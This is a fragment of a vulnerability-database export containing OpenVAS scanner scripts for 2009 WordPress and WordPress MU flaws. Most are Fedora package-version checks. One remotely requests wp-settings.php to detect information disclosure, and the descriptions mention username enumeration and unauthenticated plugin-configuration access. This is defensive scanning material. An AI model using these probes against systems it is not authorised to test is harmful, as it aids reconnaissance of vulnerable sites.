"scanner", "cvelist": ["CVE-2009-2334", "CVE-2009-2335", "CVE-2009-2336"], "description": "The remote host is missing an update to wordpress-mu\nannounced via advisory FEDORA-2009-8529.", "modified": "2017-07-10T00:00:00", "published": "2009-09-02T00:00:00", "id": "OPENVAS:64697", "href": "http://plugins.openvas.org/nasl.php?oid=64697", "type": "openvas", "title": "Fedora Core 11 FEDORA-2009-8529 (wordpress-mu)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: fcore_2009_8529.nasl 6624 2017-07-10 06:11:55Z cfischer $\n# Description: Auto-generated from advisory FEDORA-2009-8529 (wordpress-mu)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Update spans MU-versions for the following security releases from upstream:\n\nhttp://wordpress.org/development/2009/08/2-8-4-security-release/\nhttp://wordpress.org/development/2009/08/wordpress-2-8-3-security-release/\n\n* Backport of XSS fixes from WordPress 2.8.2\n* Backport of security fixes for admin.php?page= bugs (CVE-2009-2334)\n\nChangeLog:\n\n* Wed Aug 12 2009 Bret McMillan - 2.8.4a-1\n- Update to version 2.8.4a for security fixes\n* Fri Jul 10 2009 Bret McMillan - 2.7-6\n- Patch for CVE-2009-2334\";\ntag_solution = \"Apply the appropriate updates.\n\nThis update can be installed with the yum update program. Use \nsu -c 'yum update wordpress-mu' at the command line.\nFor more information, refer to Managing Software with yum,\navailable at http://docs.fedoraproject.org/yum/.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=FEDORA-2009-8529\";\ntag_summary = \"The remote host is missing an update to wordpress-mu\nannounced via advisory FEDORA-2009-8529.\";\n\n\n\nif(description)\n{\n script_id(64697);\n script_version(\"$Revision: 6624 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 08:11:55 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-09-02 04:58:39 +0200 (Wed, 02 Sep 2009)\");\n script_cve_id(\"CVE-2009-2334\", \"CVE-2009-2335\", \"CVE-2009-2336\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_name(\"Fedora Core 11 FEDORA-2009-8529 (wordpress-mu)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=510745\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"wordpress-mu\", rpm:\"wordpress-mu~2.8.4a~1.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2017-07-25T10:56:46", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-2334", "CVE-2009-2335", "CVE-2009-2336"], "description": "The remote host is missing an update to wordpress\nannounced via advisory FEDORA-2009-7729.", "modified": "2017-07-10T00:00:00", "published": "2009-07-29T00:00:00", "id": "OPENVAS:64407", "href": "http://plugins.openvas.org/nasl.php?oid=64407", "type": "openvas", "title": "Fedora Core 10 FEDORA-2009-7729 (wordpress)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: fcore_2009_7729.nasl 6624 2017-07-10 06:11:55Z cfischer $\n# Description: Auto-generated from advisory FEDORA-2009-7729 (wordpress)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"ChangeLog:\n\n* Fri Jul 10 2009 Adrian Reber - 2.8.1-1\n- updated to 2.8.1 for security fixes - BZ 510745\n* Mon Jun 22 2009 Adrian Reber - 2.8-1\n- updated to 2.8\";\ntag_solution = \"Apply the appropriate updates.\n\nThis update can be installed with the yum update program. Use \nsu -c 'yum update wordpress' at the command line.\nFor more information, refer to Managing Software with yum,\navailable at http://docs.fedoraproject.org/yum/.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=FEDORA-2009-7729\";\ntag_summary = \"The remote host is missing an update to wordpress\nannounced via advisory FEDORA-2009-7729.\";\n\n\n\nif(description)\n{\n script_id(64407);\n script_version(\"$Revision: 6624 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 08:11:55 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-07-29 19:28:37 +0200 (Wed, 29 Jul 2009)\");\n script_cve_id(\"CVE-2009-2334\", \"CVE-2009-2335\", \"CVE-2009-2336\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_name(\"Fedora Core 10 FEDORA-2009-7729 (wordpress)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=510745\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"wordpress\", rpm:\"wordpress~2.8.1~1.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-04-06T11:37:50", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-2334", "CVE-2009-2335", "CVE-2009-2336"], "description": "The remote host is missing an update to wordpress\nannounced via advisory FEDORA-2009-7701.", "modified": "2018-04-06T00:00:00", "published": "2009-07-29T00:00:00", "id": "OPENVAS:136141256231064404", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231064404", "type": "openvas", "title": "Fedora Core 11 FEDORA-2009-7701 (wordpress)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: fcore_2009_7701.nasl 9350 2018-04-06 07:03:33Z cfischer $\n# Description: Auto-generated from advisory FEDORA-2009-7701 (wordpress)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Wordpress is an online publishing / weblog package that makes it very easy,\nalmost trivial, to get information out to people on the web.\n\nChangeLog:\n\n* Fri Jul 10 2009 Adrian Reber - 2.8.1-1\n- updated to 2.8.1 for security fixes - BZ 510745\n* Mon Jun 22 2009 Adrian Reber - 2.8-1\n- updated to 2.8\";\ntag_solution = \"Apply the appropriate updates.\n\nThis update can be installed with the yum update program. Use \nsu -c 'yum update wordpress' at the command line.\nFor more information, refer to Managing Software with yum,\navailable at http://docs.fedoraproject.org/yum/.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=FEDORA-2009-7701\";\ntag_summary = \"The remote host is missing an update to wordpress\nannounced via advisory FEDORA-2009-7701.\";\n\n\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.64404\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-07-29 19:28:37 +0200 (Wed, 29 Jul 2009)\");\n script_cve_id(\"CVE-2009-2334\", \"CVE-2009-2335\", \"CVE-2009-2336\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_name(\"Fedora Core 11 FEDORA-2009-7701 (wordpress)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=510745\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"wordpress\", rpm:\"wordpress~2.8.1~1.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2017-07-25T10:56:15", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-2334", "CVE-2009-2335", "CVE-2009-2336"], "description": "The remote host is missing an update to wordpress\nannounced via advisory FEDORA-2009-7701.", "modified": "2017-07-10T00:00:00", "published": "2009-07-29T00:00:00", "id": "OPENVAS:64404", "href": "http://plugins.openvas.org/nasl.php?oid=64404", "type": "openvas", "title": "Fedora Core 11 FEDORA-2009-7701 (wordpress)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: fcore_2009_7701.nasl 6624 2017-07-10 06:11:55Z cfischer $\n# Description: Auto-generated from advisory FEDORA-2009-7701 (wordpress)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Wordpress is an online publishing / weblog package that makes it very easy,\nalmost trivial, to get information out to people on the web.\n\nChangeLog:\n\n* Fri Jul 10 2009 Adrian Reber - 2.8.1-1\n- updated to 2.8.1 for security fixes - BZ 510745\n* Mon Jun 22 2009 Adrian Reber - 2.8-1\n- updated to 2.8\";\ntag_solution = \"Apply the appropriate updates.\n\nThis update can be installed with the yum update program. Use \nsu -c 'yum update wordpress' at the command line.\nFor more information, refer to Managing Software with yum,\navailable at http://docs.fedoraproject.org/yum/.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=FEDORA-2009-7701\";\ntag_summary = \"The remote host is missing an update to wordpress\nannounced via advisory FEDORA-2009-7701.\";\n\n\n\nif(description)\n{\n script_id(64404);\n script_version(\"$Revision: 6624 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 08:11:55 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-07-29 19:28:37 +0200 (Wed, 29 Jul 2009)\");\n script_cve_id(\"CVE-2009-2334\", \"CVE-2009-2335\", \"CVE-2009-2336\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_name(\"Fedora Core 11 FEDORA-2009-7701 (wordpress)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=510745\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"wordpress\", rpm:\"wordpress~2.8.1~1.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-04-06T11:40:32", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-2334", "CVE-2009-1030", "CVE-2009-2335", "CVE-2009-2336"], "description": "The remote host is missing an update to wordpress-mu\nannounced via advisory FEDORA-2009-8538.", "modified": "2018-04-06T00:00:00", "published": "2009-09-02T00:00:00", "id": "OPENVAS:136141256231064699", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231064699", "type": "openvas", "title": "Fedora Core 10 FEDORA-2009-8538 (wordpress-mu)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: fcore_2009_8538.nasl 9350 2018-04-06 07:03:33Z cfischer $\n# Description: Auto-generated from advisory FEDORA-2009-8538 (wordpress-mu)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Update Information:\n\nUpdate spans MU-versions for the following security releases from upstream:\n\nhttp://wordpress.org/development/2009/08/2-8-4-security-release/\nhttp://wordpress.org/development/2009/08/wordpress-2-8-3-security-release/\n* Backport of XSS fixes from WordPress 2.8.2\n* Backport of security fixes for admin.php?page=bugs (CVE-2009-2334)\n\nChangeLog:\n\n* Wed Aug 12 2009 Bret McMillan - 2.8.4a-1\n- Update to version 2.8.4a for security fixes\n* Fri Jul 10 2009 Bret McMillan - 2.7-6\n- Patch for CVE-2009-2334\n- Update to version 2.7\n- Alter source prep so I can still use upstream's tarball\n- favicon.ico removed from manifest\";\ntag_solution = \"Apply the appropriate updates.\n\nThis update can be installed with the yum update program. Use \nsu -c 'yum update wordpress-mu' at the command line.\nFor more information, refer to Managing Software with yum,\navailable at http://docs.fedoraproject.org/yum/.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=FEDORA-2009-8538\";\ntag_summary = \"The remote host is missing an update to wordpress-mu\nannounced via advisory FEDORA-2009-8538.\";\n\n\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.64699\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-09-02 04:58:39 +0200 (Wed, 02 Sep 2009)\");\n script_cve_id(\"CVE-2009-2334\", \"CVE-2009-1030\", \"CVE-2009-2335\", \"CVE-2009-2336\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_name(\"Fedora Core 10 FEDORA-2009-8538 (wordpress-mu)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=510745\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"wordpress-mu\", rpm:\"wordpress-mu~2.8.4a~1.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2017-07-25T10:57:11", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-2334", "CVE-2009-1030", "CVE-2009-2335", "CVE-2009-2336"], "description": "The remote host is missing an update to wordpress-mu\nannounced via advisory FEDORA-2009-8538.", "modified": "2017-07-10T00:00:00", "published": "2009-09-02T00:00:00", "id": "OPENVAS:64699", "href": "http://plugins.openvas.org/nasl.php?oid=64699", "type": "openvas", "title": "Fedora Core 10 FEDORA-2009-8538 (wordpress-mu)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: fcore_2009_8538.nasl 6624 2017-07-10 06:11:55Z cfischer $\n# Description: Auto-generated from advisory FEDORA-2009-8538 (wordpress-mu)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Update Information:\n\nUpdate spans MU-versions for the following security releases from upstream:\n\nhttp://wordpress.org/development/2009/08/2-8-4-security-release/\nhttp://wordpress.org/development/2009/08/wordpress-2-8-3-security-release/\n* Backport of XSS fixes from WordPress 2.8.2\n* Backport of security fixes for admin.php?page=bugs (CVE-2009-2334)\n\nChangeLog:\n\n* Wed Aug 12 2009 Bret McMillan - 2.8.4a-1\n- Update to version 2.8.4a for security fixes\n* Fri Jul 10 2009 Bret McMillan - 2.7-6\n- Patch for CVE-2009-2334\n- Update to version 2.7\n- Alter source prep so I can still use upstream's tarball\n- favicon.ico removed from manifest\";\ntag_solution = \"Apply the appropriate updates.\n\nThis update can be installed with the yum update program. Use \nsu -c 'yum update wordpress-mu' at the command line.\nFor more information, refer to Managing Software with yum,\navailable at http://docs.fedoraproject.org/yum/.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=FEDORA-2009-8538\";\ntag_summary = \"The remote host is missing an update to wordpress-mu\nannounced via advisory FEDORA-2009-8538.\";\n\n\n\nif(description)\n{\n script_id(64699);\n script_version(\"$Revision: 6624 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 08:11:55 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-09-02 04:58:39 +0200 (Wed, 02 Sep 2009)\");\n script_cve_id(\"CVE-2009-2334\", \"CVE-2009-1030\", \"CVE-2009-2335\", \"CVE-2009-2336\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_name(\"Fedora Core 10 FEDORA-2009-8538 (wordpress-mu)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=510745\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"wordpress-mu\", rpm:\"wordpress-mu~2.8.4a~1.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2020-05-12T17:33:26", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-2334", "CVE-2009-2432", "CVE-2009-2335", "CVE-2009-2336"], "description": "The host is running WordPress / WordPress MU and is prone to multiple\n vulnerabilities", "modified": "2020-05-08T00:00:00", "published": "2009-07-18T00:00:00", "id": "OPENVAS:1361412562310800662", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310800662", "type": "openvas", "title": "WordPress / WordPress MU Multiple Vulnerabilities - July09", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# WordPress / WordPress MU Multiple Vulnerabilities - July09\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.800662\");\n script_version(\"2020-05-08T08:34:44+0000\");\n script_tag(name:\"last_modification\", value:\"2020-05-08 08:34:44 +0000 (Fri, 08 May 2020)\");\n script_tag(name:\"creation_date\", value:\"2009-07-18 09:37:41 +0200 (Sat, 18 Jul 2009)\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_cve_id(\"CVE-2009-2432\", \"CVE-2009-2336\", \"CVE-2009-2335\", \"CVE-2009-2334\");\n script_bugtraq_id(35581, 35584);\n script_name(\"WordPress / WordPress MU Multiple Vulnerabilities - July09\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"secpod_wordpress_detect_900182.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_mandatory_keys(\"wordpress/installed\");\n\n script_xref(name:\"URL\", value:\"http://www.vupen.com/english/advisories/2009/1833\");\n script_xref(name:\"URL\", value:\"http://securitytracker.com/alerts/2009/Jul/1022528.html\");\n script_xref(name:\"URL\", value:\"http://www.securityfocus.com/archive/1/archive/1/504795/100/0/threaded\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attackers to view the content of plugins\n configuration pages, inject malicious scripting code, or gain knowledge of sensitive username information.\");\n\n script_tag(name:\"affected\", value:\"WordPress / WordPress MU version prior to 2.8.1.\");\n\n script_tag(name:\"insight\", value:\"- Error in 'wp-settings.php' which may disclose sensitive information via\n a direct request.\n\n - Error occur when user attempt for failed login or password request depending\n on whether the user account exists, and it can be exploited by enumerate valid usernames.\n\n - Error in wp-admin/admin.php is does not require administrative authentication\n to access the configuration of a plugin, which allows attackers to specify a\n configuration file in the page parameter via collapsing-archives/options.txt,\n related-ways-to-take-action/options.php, wp-security-scan/securityscan.php,\n akismet/readme.txt and wp-ids/ids-admin.php.\");\n\n script_tag(name:\"solution\", value:\"Update to Version 2.8.1 or later.\");\n\n script_tag(name:\"summary\", value:\"The host is running WordPress / WordPress MU and is prone to multiple\n vulnerabilities\");\n\n script_tag(name:\"qod_type\", value:\"remote_analysis\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\ninclude(\"host_details.inc\");\n\ncpe_list = make_list( \"cpe:/a:wordpress:wordpress_mu\", \"cpe:/a:wordpress:wordpress\" );\n\nif( ! infos = get_app_port_from_list( cpe_list:cpe_list ) )\n exit( 0 );\n\ncpe = infos[\"cpe\"];\nport = infos[\"port\"];\n\nif( ! dir = get_app_location( cpe:cpe, port:port ) )\n exit( 0 );\n\nif( dir == \"/\" )\n dir = \"\";\n\nurl = dir + \"/wp-settings.php\";\n\nreq = http_get( item:url, port:port );\nres = http_keepalive_send_recv( port:port, data:req );\nif( \"ABSPATHwp-include\" >< res && \"include_path\" >< res ) {\n report = http_report_vuln_url( port:port, url:url );\n security_message( port:port, data:report );\n exit( 0 );\n}\n\nexit( 99 );\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, 